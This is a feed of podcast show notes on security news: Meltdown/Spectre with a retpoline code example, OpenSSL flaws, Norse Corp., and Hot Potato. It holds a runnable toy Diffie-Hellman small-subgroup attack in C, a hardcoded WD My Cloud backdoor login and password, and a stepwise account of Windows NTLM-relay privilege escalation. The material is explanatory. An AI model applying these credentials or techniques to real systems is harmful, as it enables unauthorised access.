Backdoor – Jupiter Broadcasting
https://www.jupiterbroadcasting.com
Open Source Entertainment, on Demand.
Feed last built: Mon, 24 Jun 2019 01:28:04 +0000

SACK Attack | TechSNAP 406
https://original.jupiterbroadcasting.net/132271/sack-attack-techsnap-406/
Sun, 23 Jun 2019 17:28:04 +0000

Show Notes: techsnap.systems/406

The post SACK Attack | TechSNAP 406 first appeared on Jupiter Broadcasting.

Supply Chain Attacks | TechSNAP 400
https://original.jupiterbroadcasting.net/130096/supply-chain-attacks-techsnap-400/
Fri, 29 Mar 2019 07:16:56 +0000

Show Notes: techsnap.systems/400

Tainted Love | LINUX Unplugged 294
https://original.jupiterbroadcasting.net/130011/tainted-love-linux-unplugged-294/
Wed, 27 Mar 2019 07:03:58 +0000

Show Notes/Links: linuxunplugged.com/294

Performance Meltdown | TechSNAP 351
https://original.jupiterbroadcasting.net/121472/performance-meltdown-techsnap-351/
Thu, 11 Jan 2018 19:58:00 +0000


Show Notes:

What is Meltdown and Spectre

  • Meltdown and Spectre

  • These vulnerabilities have been present in most computers for nearly 20 years.

  • Both vulnerabilities exploit performance features (caching and speculative execution) common to many modern processors to leak data via a so-called side-channel attack.

  • What is a side channel?

From Wikipedia:

“… a side-channel attack is any attack based on information gained from the physical implementation of a cryptosystem, rather than brute force or theoretical weaknesses in the algorithms (compare cryptanalysis). For example, timing information, power consumption, electromagnetic leaks or even sound can provide an extra source of information, which can be exploited to break the system.”

  • Spectre and Meltdown are side-channel attacks which deduce the contents of a memory location which should not normally be accessible by using timing to observe whether another, accessible, location is present in the cache.

  • Meltdown is a CPU vulnerability. It abuses modern processors’ out-of-order execution to read arbitrary kernel-memory locations, which can include personal data and passwords. Out-of-order execution is an important performance feature found in most modern processors; Meltdown in particular affects Intel processors (essentially every generation since 1995, apart from Itanium and pre-2013 Atom). By breaking down the wall between user applications and the operating system’s memory, it can be used to spy on the memory of other programs and of the operating system itself.

  • Spectre breaks down the isolation between different applications: it tricks a victim program into speculatively executing code paths that touch memory it would never read architecturally, and leaks the result through the cache. Spectre is harder to exploit than Meltdown, but it is also harder to mitigate, and it affects more CPU architectures (Intel, AMD and ARM designs) than Meltdown does. At the time of this episode (January 2018) there were no universal Spectre patches; mitigations were per variant and per vendor (Retpoline, discussed below, targets Variant 2, branch target injection).

  • Meltdown And Spectre Explained

  • The timeline: How we got to Spectre and Meltdown

  • ‘It Can’t Be True.’ Inside the Semiconductor Industry’s Meltdown

Behind the Scenes all is not well

Meltdown and Spectre Patch Performance Hit

Protecting our Google Cloud customers from new vulnerabilities without impacting performance

With the performance characteristics uncertain, we started looking for a “moonshot”—a way to mitigate Variant 2 without hardware support. Finally, inspiration struck in the form of “Retpoline”—a novel software binary modification technique that prevents branch-target-injection, created by Paul Turner, a software engineer who is part of our Technical Infrastructure group. With Retpoline, we didn’t need to disable speculative execution or other hardware features. Instead, this solution modifies programs to ensure that execution cannot be influenced by an attacker.
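
The paragraph above describes Retpoline but not the construct itself. Below is an added example, written for this page and not taken from Google, the Linux kernel or the original post, showing the x86-64 retpoline thunk next to the plain indirect call it replaces. The function names (op_double, op_square, call_direct, call_via_retpoline, apply_all) and the thunk symbol retpoline_thunk_rax are this example's own; compilers emit the same shape under names like __x86_indirect_thunk_rax when built with -mindirect-branch=thunk (GCC) or -mretpoline (Clang). On targets other than x86-64 ELF the retpoline path falls back to a normal call so the program still builds.

```c
/* Added example: a hand-written x86-64 retpoline thunk standing in for an
 * indirect `call *%rax`, next to the plain indirect call it replaces. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef uint64_t (*op_fn)(uint64_t);

/* Two possible targets of the indirect call (constructed for the example). */
static uint64_t op_double(uint64_t x) { return x * 2; }
static uint64_t op_square(uint64_t x) { return x * x; }

/* The unmitigated form: a plain indirect call, whose predicted target a
 * branch-target-injection attacker can steer (speculatively) to a gadget. */
static uint64_t call_direct(op_fn fn, uint64_t arg) { return fn(arg); }

#if defined(__x86_64__) && defined(__ELF__)
/* Retpoline thunk. `call 1f` pushes the address of the capture loop, and the
 * return predictor remembers it; the thunk then overwrites that stack slot
 * with the real target from %rax and executes `ret`. Architecturally control
 * reaches the target. Speculatively the CPU follows its prediction into the
 * pause/lfence loop, which never retires, so the attacker-trainable indirect
 * branch predictor is never consulted for this transfer. */
__asm__(
    ".pushsection .text,\"ax\",@progbits\n"
    ".type retpoline_thunk_rax, @function\n"
    "retpoline_thunk_rax:\n"
    "    call 1f\n"
    "2:  pause\n"
    "    lfence\n"
    "    jmp 2b\n"
    "1:  mov %rax, (%rsp)\n"
    "    ret\n"
    ".size retpoline_thunk_rax, . - retpoline_thunk_rax\n"
    ".popsection\n");

static uint64_t call_via_retpoline(op_fn fn, uint64_t arg)
{
    uint64_t result, a0 = arg;
    __asm__ volatile(
        "mov  %%rsp, %%r12\n\t"        /* remember the caller's stack pointer */
        "and  $-16, %%rsp\n\t"         /* ABI: 16-byte alignment at the call */
        "sub  $128, %%rsp\n\t"         /* stay below the compiler's red zone */
        "call retpoline_thunk_rax\n\t" /* replaces `call *%%rax` */
        "mov  %%r12, %%rsp"
        : "=a"(result), "+D"(a0)       /* target in %rax, argument in %rdi */
        : "a"(fn)
        : "r12", "rsi", "rdx", "rcx", "r8", "r9", "r10", "r11",
          "xmm0", "xmm1", "xmm2", "xmm3", "xmm4", "xmm5", "xmm6", "xmm7",
          "xmm8", "xmm9", "xmm10", "xmm11", "xmm12", "xmm13", "xmm14", "xmm15",
          "memory", "cc");
    return result;
}
#else
/* Other targets: fall back to the plain call so the example still builds. */
static uint64_t call_via_retpoline(op_fn fn, uint64_t arg) { return fn(arg); }
#endif

/* Runs x through every op in the table, each dispatch going via the thunk. */
static uint64_t apply_all(const op_fn *ops, size_t n, uint64_t x)
{
    for (size_t i = 0; i < n; i++)
        x = call_via_retpoline(ops[i], x);
    return x;
}

int main(void)
{
    const op_fn table[] = { op_double, op_square };
    printf("direct    : %llu\n", (unsigned long long)call_direct(op_double, 21));
    printf("retpoline : %llu\n", (unsigned long long)call_via_retpoline(op_double, 21));
    printf("pipeline  : %llu\n", (unsigned long long)apply_all(table, 2, 3));
    return 0;
}
```

What the program can check is only that control still lands on the right target: whether speculation was captured is not observable without a cache side channel. The `pause; lfence; jmp` loop is never executed architecturally; it gives the speculating core a harmless place to spin until the `ret` retires and the misprediction is squashed. Compiler-generated retpolines also need the kernel or loader to flush the return stack buffer on context switches (RSB stuffing), which a user-space example cannot show.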

What’s the fix for Meltdown and Spectre?

Checking yourself and the outlook for 2018

macOS High Sierra’s App Store System Preferences Can Be Unlocked With Any Password

A bug report submitted on Open Radar in January 2018 revealed a flaw in the then-current macOS High Sierra release that allows the App Store pane in System Preferences to be unlocked with any password when logged in as an administrator.

This is a different bug from the one found in November 2017 by developer Lemi Orhan Ergin, which let anyone log into an administrator account by entering the username “root” with an empty password. That earlier flaw worked both from an authentication dialog on an unlocked Mac and at the login screen of a locked one.

WD My Cloud NAS devices have hard-wired backdoor

The backdoor, detailed here, lets anyone log in as user mydlinkBRionyg with the password abc12345cba. The credentials are hardcoded in the firmware, so the owner cannot change or remove them; only a firmware update closes the hole.

Feedback

+ New video feed https://techsnap.systems/video

Linux Action News 28
https://original.jupiterbroadcasting.net/120016/linux-action-news-28/
Sun, 19 Nov 2017 17:40:29 +0000


Episode Links
  • Fedora 27 released — The Workstation edition of Fedora 27 features GNOME 3.26. In the new release, both the Display and Network configuration panels have been updated, along with the overall Settings panel appearance improvement.
  • Firefox 57 arrives — It’s by far the biggest update we’ve had since we launched Firefox 1.0 in 2004
  • There’s an option for people who don’t like change — a fork of the Mozilla code-base pre-Servo/Rust… Basically for those not liking the direction of Firefox with v57 rolling out the Quantum changes, etc.
  • Ubuntu Unity 7 flavour might be on the horizon — A proposal to create a new community Ubuntu flavor which uses the Unity 7 desktop by default is gathering support within the Ubuntu community.
  • LTS kernel 4.14 released — Anyway, go out and test the new 4.14 release, that is slated to be the next LTS kernel – and start sending me pull request for the 4.15 merge window.
  • RISC-V support may be coming to 4.15 — RISC-V is hoping to see mainline with Linux 4.15. We’ve known for a while now about their mainline ambitions for 4.15 and a pull request was sent today, but it remains to be seen yet if Linus Torvalds will pull it for this merge window.
  • Red Hat announces ARM version of RHEL — Red Hat Enterprise Linux 7.4 for ARM, the first commercial release for this architecture.
  • OnePlus backdoor — OnePlus accidentally shipped phones with a diagnostic testing application made by Qualcomm still in place. A researcher who decompiled the application found that it can be abused to gain root access, which effectively makes it a backdoor.

Tails of Privacy | Ask Noah 13
https://original.jupiterbroadcasting.net/115891/tails-of-privacy-ask-noah-13/
Mon, 19 Jun 2017 21:43:24 +0000

— Show Notes: —

— The Cliff Notes —

  • Tails 3.0 Security Distro
  • Tails 3.0 is out
  • Tails Version 3.0 Features
  • Steam is Now on Flatpak
  • Telegram Approached by US Intelligence

— Noobs Corner —

Check out the Ask Noah Dashboard

All Drives Die | TechSNAP 318
https://original.jupiterbroadcasting.net/114566/all-drives-die-techsnap-318/
Tue, 09 May 2017 20:39:41 +0000


Show Notes:

New password guidelines say everything we thought about passwords is wrong

  • No more periodic password changes

  • No more imposed password complexity

  • Mandatory validation of newly created passwords against a list of commonly-used, expected, or compromised passwords.

  • We recommend you use a password manager and a different password for every login.

  • Rainbow tables: precomputed hash-to-password lookup tables used to turn leaked hashes back into passwords. They only work against unsalted hashes, which is one reason a leaked database of bare hashes is cracked so quickly, and why salting (with a deliberately slow hash) matters on the server side.

Enterprise hard disks are faster and use more power, but are they more reliable?

  • The enterprise disks also use more power: 9W idle and 10W operational, compared to 7.2W idle and 9W operational for comparable consumer disks.

  • If you have one or two spindles, that’s no big deal, but each Backblaze rack has 20 “storage pods” with 60 disks each. An extra 2.2kW for an idle rack is nothing to sniff at.

  • Other HGST models are also continuing to show impressive longevity, with three 4TB models and one 3TB model all boasting a sub-1 percent annualized failure rate.

Don’t trust OAuth: Why the “Google Docs” worm was so convincing

  • The worm’s OAuth consent screen asked for scopes granting access to all of your mail

  • Access to your Google Hangouts chats

  • Access to all of your contacts

  • Makes a good case for encryption and decryption at the client: an OAuth token granted to a third party can only expose what the server itself can read

  • OAuth


Some Fishy Chips | TechSNAP 317
https://original.jupiterbroadcasting.net/114371/some-fishy-chips-techsnap-317/
Wed, 03 May 2017 01:51:09 +0000


Show Notes:

Red alert! Intel patches remote execution hole that’s been hidden in biz, server chips since 2008

  • Bug is in Intel’s Active Management Technology (AMT), Standard Manageability (ISM) and Small Business Technology (SBT) firmware versions 6 to 11.6.

  • Every Intel platform with Intel Standard Manageability, Active Management Technology, or Small Business Technology, from Nehalem (2008) to Kaby Lake (2017), has a remotely exploitable hole in the AMT firmware that runs on the Intel Management Engine (ME). It is reachable over the network wherever AMT has been provisioned, and because the ME runs beneath the operating system, no OS-level control sees or stops it.

  • Are you affected? Read this!

Cooking The Precedent | Unfilter 177
https://original.jupiterbroadcasting.net/96741/cooking-the-precedent-unfilter-177/
Wed, 24 Feb 2016 22:52:07 +0000


It’s our uniquely qualified take on the FBI’s battle to get access to one of the San Bernardino shooter’s iPhones. Our coverage captures the core issues, why it is about setting a precedent, and how Apple could lose big if they don’t change their argument.

Plus the media’s scare on phone privacy at just the right time, an update on the Syrian ceasefire, Russia’s plans to snap some pictures of your backyard, a 2016 race update, and much more!

Open That iPhone | Unfilter 176
https://original.jupiterbroadcasting.net/93956/open-that-iphone-unfilter-176/
Wed, 17 Feb 2016 22:37:24 +0000


Apple vs. the FBI, privacy vs. security: the big false debate being held in the media this week. We cut the crap and discuss who is really pressing Apple, and what might be at stake in the big picture.

Plus a look at world events of the week, the big oil cutback that’s coming, and why you really should be freaking out about ISIS.

Hot Norse Potato | TechSNAP 252
https://original.jupiterbroadcasting.net/93496/hot-norse-potato-techsnap-252/
Thu, 04 Feb 2016 18:35:16 +0000


A new OpenSSL exploit, cyber security firm Norse implodes & the Windows Hot Potato flaw that’s been around for over a decade.

Plus great questions, our answers, a rockin round up & much, much more!


— Show Notes: —

OpenSSL Exploit

  • Official Advisory
  • The OpenSSL team announced versions 1.0.2f and 1.0.1r to fix a number of vulnerabilities
  • The first issue, DH small subgroups (CVE-2016-0701), is classified as “High Severity”
  • “Historically OpenSSL usually only ever generated DH parameters based on “safe” primes. More recently (in version 1.0.2) support was provided for generating X9.42 style parameter files such as those required for RFC 5114 support. The primes used in such files may not be “safe”. Where an application is using DH configured with parameters based on primes that are not “safe” then an attacker could use this fact to find a peer’s private DH exponent.”
  • “OpenSSL provides the option SSL_OP_SINGLE_DH_USE for ephemeral DH (DHE) in TLS. It is not on by default. If the option is not set then the server reuses the same private DH exponent for the life of the server process and would be vulnerable to this attack. It is believed that many popular applications do set this option and would therefore not be at risk.”
  • “OpenSSL 1.0.1 is not affected by this CVE because it does not support X9.42 based parameters”
  • Another issue, SSLv2 doesn’t block disabled ciphers (CVE-2015-3197), is classified as “Low Severity”
  • “A malicious client can negotiate SSLv2 ciphers that have been disabled on the server and complete SSLv2 handshakes even if all SSLv2 ciphers have been disabled, provided that the SSLv2 protocol was not also disabled via SSL_OP_NO_SSLv2”
  • So if your server disabled all of the SSLv2 ciphers, but didn’t disable the SSLv2 protocol itself, SSLv2 could still be used. This is likely higher severity than it seems, since it could be used in a downgrade attack
  • A third issue was an update on DHE man-in-the-middle protection (Logjam)
  • “OpenSSL added Logjam mitigation for TLS clients by rejecting handshakes with DH parameters shorter than 768 bits in releases 1.0.2b and 1.0.1n. This limit has been increased to 1024 bits in this release, to offer stronger cryptographic assurance for all TLS connections using ephemeral Diffie-Hellman key exchange.”
  • “As per the previous announcements support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date. Users of 1.0.1 are advised to upgrade. Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.”
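
The advisory text above explains the small-subgroup problem in words. The following is an added example, written for this page and not OpenSSL's code, that walks through the attack with 64-bit numbers: it builds a non-safe prime p whose p-1 is divisible by 2, 3, 5, 7, 11 and 13, a server that reuses one private exponent for every handshake (OpenSSL's behaviour when SSL_OP_SINGLE_DH_USE is not set), and an attacker that recovers that exponent. All names (find_unsafe_prime, server_handshake, recover_exponent, run_demo) are the example's own. One simplification is labelled in the code: server_handshake hands back the derived shared secret, where a real attacker would confirm each of its q candidate secrets against the handshake's Finished MAC instead.

```c
/* Added example (not OpenSSL code): small-subgroup attack on Diffie-Hellman
 * with a non-"safe" prime and a server that reuses its private exponent. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

typedef unsigned __int128 u128;

static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m)
{
    return (uint64_t)(((u128)a * b) % m);
}

static uint64_t powmod(uint64_t b, uint64_t e, uint64_t m)
{
    uint64_t r = 1 % m;
    for (b %= m; e; e >>= 1) {
        if (e & 1) r = mulmod(r, b, m);
        b = mulmod(b, b, m);
    }
    return r;
}

static bool is_prime(uint64_t n)
{
    if (n < 2) return false;
    for (uint64_t d = 2; d * d <= n; d++)
        if (n % d == 0) return false;
    return true;
}

/* Small primes deliberately built into p - 1. A safe prime p = 2q + 1 offers
 * only the subgroup of order 2, which leaks a single bit of x. */
static const uint64_t SMALL[] = {2, 3, 5, 7, 11, 13};
static const size_t NSMALL = sizeof SMALL / sizeof SMALL[0];
static const uint64_t SMOOTH = 2 * 3 * 5 * 7 * 11 * 13;   /* 30030 */

/* Constructed non-safe prime p = SMOOTH*k + 1; k bounds the final brute force. */
static uint64_t find_unsafe_prime(uint64_t k_start, uint64_t *k_out)
{
    for (uint64_t k = k_start;; k++) {
        uint64_t p = SMOOTH * k + 1;
        if (is_prime(p)) { *k_out = k; return p; }
    }
}

/* Server keeping one private exponent x for every handshake: OpenSSL's
 * behaviour when SSL_OP_SINGLE_DH_USE is not set. */
struct dh_server { uint64_t p, g, x, pub; };

static void server_init(struct dh_server *s, uint64_t p, uint64_t g, uint64_t x)
{
    s->p = p; s->g = g; s->x = x; s->pub = powmod(g, x, p);
}

/* Server side of one handshake. Simplification: the derived secret is returned
 * directly; a real attacker instead tests each of its q candidate secrets
 * against the Finished MAC, which yields the same information. */
static uint64_t server_handshake(const struct dh_server *s, uint64_t peer_pub)
{
    return powmod(peer_pub, s->x, s->p);
}

/* An element of exact order q in Z_p^* (q prime, q | p - 1). */
static uint64_t element_of_order(uint64_t p, uint64_t q)
{
    for (uint64_t r = 2;; r++) {
        uint64_t h = powmod(r, (p - 1) / q, p);
        if (h != 1) return h;
    }
}

/* Attacker: a handshake with an order-q element leaks x mod q, because
 * h^x = h^(x mod q). CRT combines the residues into x mod SMOOTH; the missing
 * multiple of SMOOTH is then matched against the server's public value. */
static uint64_t recover_exponent(const struct dh_server *s, uint64_t k)
{
    uint64_t res = 0, mod = 1;                  /* invariant: x ≡ res (mod mod) */
    for (size_t i = 0; i < NSMALL; i++) {
        uint64_t q = SMALL[i];
        uint64_t h = element_of_order(s->p, q);
        uint64_t secret = server_handshake(s, h);
        uint64_t e = 0, t = 0;
        while (powmod(h, e, s->p) != secret) e++;    /* at most q guesses */
        while ((res + mod * t) % q != e) t++;        /* CRT lift to mod*q */
        res += mod * t;
        mod *= q;
    }
    for (uint64_t t = 0; t < k; t++) {               /* x = res + SMOOTH*t */
        uint64_t cand = res + mod * t;
        if (powmod(s->g, cand, s->p) == s->pub) return cand;
    }
    return 0;                                        /* not found */
}

/* Builds the vulnerable server and runs the attack; returns the recovered x. */
static uint64_t run_demo(struct dh_server *s, uint64_t *k)
{
    uint64_t p = find_unsafe_prime(100000, k);
    uint64_t x = 0x9E3779B97F4A7C15ULL % (p - 2) + 1;  /* fixed stand-in for a random exponent */
    server_init(s, p, 2, x);
    return recover_exponent(s, *k);
}

int main(void)
{
    struct dh_server s;
    uint64_t k, rec = run_demo(&s, &k);
    printf("p = %llu = 30030 * %llu + 1, server x = %llu\n",
           (unsigned long long)s.p, (unsigned long long)k, (unsigned long long)s.x);
    printf("recovered x = %llu (%s)\n", (unsigned long long)rec,
           powmod(s.g, rec, s.p) == s.pub ? "reproduces the server's public value" : "failed");
    return 0;
}
```

Either of the advisory's two conditions defeats this: with SSL_OP_SINGLE_DH_USE set, each handshake uses a fresh x, so the residues the attacker collects belong to different exponents and the CRT step combines noise; with a safe prime, the only small subgroup has order 2 and leaks one bit. OpenSSL 1.0.2f turned single-use on by default as part of the fix.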

Krebs: Norse Corp. Implodes

  • Norse Corp is a security startup that has made a lot of headlines, many surrounding its graphical “Attack Map” of the Internet
  • Last month, Norse unexpectedly laid off more than 30% of its workforce
  • Now, Norse’s CEO, Sam Glines, has been asked to step down by the board of directors
  • “sources say the company’s investors have told employees that they can show up for work on Monday but that there is no guarantee they will get paid if they do.”
  • “Glines agreed earlier this month to an interview with KrebsOnSecurity but later canceled that engagement without explanation.”
  • “Two sources at Norse said the company’s assets will be merged with networking firm SolarFlare, which has some of the same investors and investment capital as Norse. Neither Norse nor SolarFlare would comment for this story.”
  • “Update, Feb. 1, 12:34 p.m. ET: SolarFlare CEO Russell Stern just pinged me to say that “there has been no transaction between Norse and SolarFlare.””
  • “A careful review of previous ventures launched by the company’s founders reveals a pattern of failed businesses, reverse mergers, shell companies and product promises that missed the mark by miles”
  • “In the tech-heavy, geek-speak world of cybersecurity, infographics and other eye candy are king because they promise to make complicated and boring subjects accessible and sexy. And Norse’s much-vaunted interactive attack map is indeed some serious eye candy: It purports to track the source and destination of countless Internet attacks in near real-time, and shows what appear to be multicolored fireballs continuously arcing across the globe.”
  • “Several departing and senior Norse employees said the company’s attack data was certainly voluminous enough to build a business upon — if not especially sophisticated or uncommon. But most of those interviewed said Norse’s top leadership didn’t appear to be interested in or capable of building a strong product behind the data. More worryingly, those same people said there are serious questions about the validity of the data that informs the company’s core product.”
  • “Norse Corp. and its fundamental technology arose from the ashes of several companies that appear to have been launched and then acquired by shell companies owned by Norse’s top executives — principally the company’s founder and chief technology officer Tommy Stiansen. Stiansen”
  • “This acquisition process, known as a “reverse merger” or “reverse takeover,” involves the acquisition of a public company by a private company so that the private company can bypass the lengthy and complex process of going public. Reverse mergers are completely legal, but they can be abused to hide the investors in a company and to conceal certain liabilities of the acquired company, such as pending lawsuits or debt. In 2011, the U.S. Securities and Exchange Commission (SEC) issued a bulletin cautioning investors about plunking down investments in reverse mergers, warning that they may be prone to fraud and other abuses.”
  • The founders of Norse Corp. got their start in 1998 with a company called Cyco.net (pronounced “psycho”). According to a press release issued at the time, “Cyco.net was a New Mexico based firm established to develop a network of cyber companies.” “This site is a lighthearted destination that will be like the ‘People Magazine’ of the Internet”
  • “In 2003, Cyco.net acquired Orion Security Services, a company founded by Stiansen, Norse’s current CTO and founder and the one Norse executive who is actually from Norway. Orion was billed as a firm that provides secure computer network management solutions, as well as video surveillance systems via satellite communications.”
  • “Despite claims that Cyco.net was poised to “rocket into the deepest riches of cyberspace,” it somehow fell short of that destination and ended up selling cigarettes online instead. Perhaps inevitably, the company soon found itself the target of a lawsuit by several states led by the Washington state attorney general that accused the company of selling tobacco products to minors, failing to report cigarette sales and taxes, and for falsely advertising cigarettes as tax-free.”
  • “In 2005, Cyco.net changed its name to Nexicon, but only after acquiring by stock swap another creation by Stiansen — Pluto Communications — a company formed in 2002 and whose stated mission was to provide “operational billing solutions for telecom networks.” Again, Urrea would issue a press release charting a course for the company that would have almost no bearing on what it actually ended up doing.”
  • “In June 2008, Sam Glines — who would one day become CEO of Norse Corp. — joined Nexicon and was later promoted to chief operating officer. By that time, Nexicon had morphed itself into an online copyright cop, marketing a technology they claimed could help detect and stop illegal file-sharing. The company’s “GetAmnesty” technology sent users a pop-up notice explaining that it was expensive to sue the user and even more expensive for the user to get sued. Recipients of these notices were advised to just click the button displayed and pay for the song and all would be forgiven.”
  • “In November 2008, Nexicon was acquired by Priviam, another shell company operated by Stiansen and Nexicon’s principals. Nexicon went on to sign Youtube.com and several entertainment studios as customers. But soon enough, reports began rolling in of rampant false-positives — Internet users receiving threatening legal notices from Nexicon that they were illegally sharing files when they actually weren’t. Nexicon/Priviam’s business began drying up, and its stock price plummeted.”
  • “In September 2011, the Securities and Exchange Commission revoked the company’s ability to trade its penny stock (then NXCO on the pink sheets), noting that the company had failed to file any periodic reports with the SEC since its inception. In June 2012, the SEC also revoked Priviam’s ability to trade its stock, citing the same compliance failings that led to the de-listing of Nexicon.”
  • “By the time the SEC revoked Nexicon’s trading ability, the company’s founders were already working to reinvent themselves yet again. In August 2011, they raised $50,000 in seed money from Capital Innovators to jump-start Norse Corp. A year later, Norse received $3.5 million in debt refinancing, and in December 2013 got its first big infusion of cash — $10 million from Oak Investment Partners. In September 2015, KPMG invested $11.4 million in the company.”
  • “Several former employees say Stiansen’s penchant for creating shell corporations served him well in building out Norse’s global sensor network. Some of the sensors are in countries where U.S. assets are heavily monitored, such as China. Those same insiders said Norse’s network of shell corporations also helped the company gain visibility into attack traffic in countries where it is forbidden for U.S. firms to do business, such as Iran and Syria.”
  • “By 2014, former employees say Norse’s systems were collecting a whopping 140 terabytes of Internet attack and traffic data per day.”
  • Norse’s senior data scientist says she “wasn’t actually given access to all that data until the fall of 2015 — seven months after being hired as Norse’s chief data scientist — and that when she got the chance to dig into it, she was disappointed: The information appeared to be little more than what one might glean from a Web server log — albeit millions of them around the world.”
  • “The data isn’t great, and it’s pretty much the same thing as if you looked at Web server logs that had automated crawlers and scanning tools hitting it constantly. But if you know how to look at it and bring in a bunch of third-party data and tools, the data is not without its merits, if not just based on the sheer size of it.”
  • “Landesman and other current and former Norse employees said very few people at the company were permitted to see how Norse collected its sensor data, and that Norse founder Stiansen jealously guarded access to the back-end systems that gathered the information.”
  • This seems to be to cover up the fact that there was no “secret sauce”, it was all smoke and mirrors
  • “With this latest round of layoffs, if Tommy got hit by a bus tomorrow I don’t think there would be a single person in the company left who understands how the whole thing works,” said one former employee at Norse who spoke on condition of anonymity.
  • “Stuart McClure, president and founder of the cybersecurity firm Cylance, said he found out just how reluctant Stiansen could be to share Norse data when he visited Stiansen and the company’s offices in Northern California in late 2014. McClure said he went there to discuss collaborating with Norse on two upcoming reports: One examining Iran’s cyber warfare capabilities, and another about exactly who was responsible for the massive Nov. 2014 cyber attack on Sony Pictures Entertainment.”
  • “The FBI had already attributed the attack to North Korean hackers. But McClure was intrigued after Stiansen confidentially shared that Norse had reached a vastly different conclusion than the FBI: Norse had data suggesting the attack on Sony was the work of disgruntled former employees.”
  • “McClure said he recalls listening to Stiansen ramble on for hours about Norse’s suspicions and simultaneously dodging direct questions about how it had reached the conclusion that the Sony attack was an inside job.”
  • “I just kept going back to them and said, ‘Tommy, show me the data.’ We wanted to work with them, but when they couldn’t or wouldn’t produce any data or facts to substantiate their work, we couldn’t proceed.”
  • “Conversely, Norse’s take on Iran’s cyber prowess (PDF) was trounced by critics as a deeply biased, headline-grabbing report. It came near the height of international negotiations over lifting nuclear sanctions against Iran, and Norse had teamed up with the American Enterprise Institute, a conservative think tank that has traditionally taken a hard line against threats or potential threats to the United States.”
  • “In its report, Norse said it saw a half-million attacks on industrial control systems by Iran in the previous 24 months — a 115 percent increase in attacks. But in a scathing analysis of Norse’s findings, critical infrastructure security expert Robert M. Lee said Norse’s claim of industrial control systems being attacked and implying it was definitively the Iranian government was disingenuous at best. Lee said he obtained an advanced copy of an earlier version of the report that was shared with unclassified government and private industry channels, and that the data in the report simply did not support its conclusions.”
  • “KrebsOnSecurity interviewed almost a dozen current and former employees at Norse, as well as several outside investors who said they considered buying the firm. None but Landesman would speak on the record. Most said Norse’s data — the core of its offering — was solid, if prematurely marketed as a way to help banks and others detect and deflect cyber attacks.”
  • The problem seems to be that the company’s top executives were more interested in attracting investment on the strength of the “Attack Map” and their marketing than in actually building the product
  • “I think they just went to market with this a couple of years too soon,” said one former Norse employee who left on his own a few months prior to the January 2016 layoffs, in part because of concerns about the validity of the data that the company was using to justify some of its public threat reports. “It wasn’t all there, and I worried that they were finding what they wanted to find in the data. If you think about the network they built, that’s a lot of power.”
  • After being fired, some former employees started doing some deeper digging
  • “I realized that, oh crap, I think this is a scam,” Landesman said. “They’re trying to draw this out and tap into whatever the buzzwords du jour there are, and have a product that’s going to meet that and suck in new investors.”
  • “These shell companies formed by [the company’s founders] bilked investors,” Landesman said. “Had anyone gone and investigated any of these partnerships they were espousing as being the next big thing, they would have realized this was all smoke and mirrors.”

Windows Privilege Escalation — Hot Potato

  • Hot Potato (aka: Potato) takes advantage of known issues in Windows to gain local privilege escalation in default configurations, namely NTLM relay (specifically HTTP->SMB relay) and NBNS spoofing.
  • If this sounds vaguely familiar, it’s because a similar technique was disclosed by the guys at Google Project Zero – https://code.google.com/p/google-security-research/issues/detail?id=222 . In fact, some of our code was shamelessly borrowed from their PoC and expanded upon.
  • Using this technique, an attacker can elevate their privilege on a Windows workstation from the lowest level to “NT AUTHORITY\SYSTEM”, the highest level of privilege available on a Windows machine.
  • This is important because many organizations unfortunately rely on Windows account privileges to protect their corporate network.
  • This is perfect for the island hopping technique we frequently talk about on TechSNAP.
  • The techniques that this exploit uses to gain privilege escalation aren’t new, but the way they are combined is. Microsoft is aware of all of these issues and has been for some time (circa 2000). These are unfortunately hard to fix without breaking backward compatibility and have been leveraged by attackers for over 15 years.
  • The exploit consists of 3 main parts, all of which are somewhat configurable through command-line switches.

  • Part One: Local NBNS Spoofer

  • If we can know ahead of time which hostname a target machine (in this case our target is 127.0.0.1) will be sending an NBNS query for, we can craft a fake response and flood the target host with NBNS responses very quickly (since it is a UDP protocol).

  • One complication is that a 2-byte field in the NBNS packet, the TXID, must match in the request and response, and we are unable to see the request. We can overcome this by flooding quickly and iterating over all 65536 possible values.
  • What if the network we are targeting has a DNS record for the host we want to spoof?
  • We can use a technique called UDP port exhaustion to force ALL DNS lookups on the system to fail. All we do is bind to EVERY single UDP port. This causes DNS to fail because there will be no available UDP source port for the request. When DNS fails, NBNS will be the fallback.

  • Part Two: Fake WPAD Proxy Server

  • In Windows, Internet Explorer by default will automatically try to detect the network proxy configuration (WPAD), by resolving the host “WPAD” and fetching a PAC file from it.

  • This also surprisingly applies to some Windows services such as Windows Update, but exactly how and under what conditions seems to be version dependent.
  • With the ability to spoof NBNS responses, we can target our NBNS spoofer at 127.0.0.1. We flood the target machine (our own machine) with NBNS response packets for the host “WPAD”, or “WPAD.DOMAIN.TLD”, and we say that the WPAD host has IP address 127.0.0.1.
  • At the same time, we run an HTTP server locally on 127.0.0.1, configured with a response at the URL IE will be checking.
  • This will cause all HTTP traffic on the target to be redirected through our server running on 127.0.0.1.

Part Three: HTTP -> SMB NTLM Relay

  • NTLM relay is a well known, but often misunderstood attack against Windows NTLM authentication. The NTLM protocol is vulnerable to man-in-the-middle attacks. If an attacker can trick a user into trying to authenticate using NTLM to his machine, he can relay that authentication attempt to another machine!
  • Microsoft patched this by disallowing same-protocol NTLM authentication using a challenge that is already in flight. What this means is that SMB->SMB NTLM relay from one host back to itself will no longer work. However cross-protocol attacks such as HTTP->SMB will still work with no issue!
  • With all HTTP traffic now presumably flowing through an HTTP server that we control, we can do things like redirect them somewhere that will request NTLM authentication.
  • In the Potato exploit, all HTTP requests are redirected with a 302 redirect to “http://localhost/GETHASHESxxxxx”, where xxxxx is some unique identifier. Requests to “http://localhost/GETHASHESxxxxx” respond with a 401 request for NTLM authentication.
  • Any NTLM credentials are then relayed to the local SMB listener to create a new system service that runs a user-defined command.
  • When the HTTP request in question originates from a high privilege account, for example, when it is a request from the Windows Update service, this command will run with “NT AUTHORITY\SYSTEM” privilege!

  • Windows 7 can be fairly reliably exploited through the Windows Defender update mechanism.

  • Since Windows Server doesn’t come with Defender, we need an alternate method. Instead we’ll simply check for Windows updates.
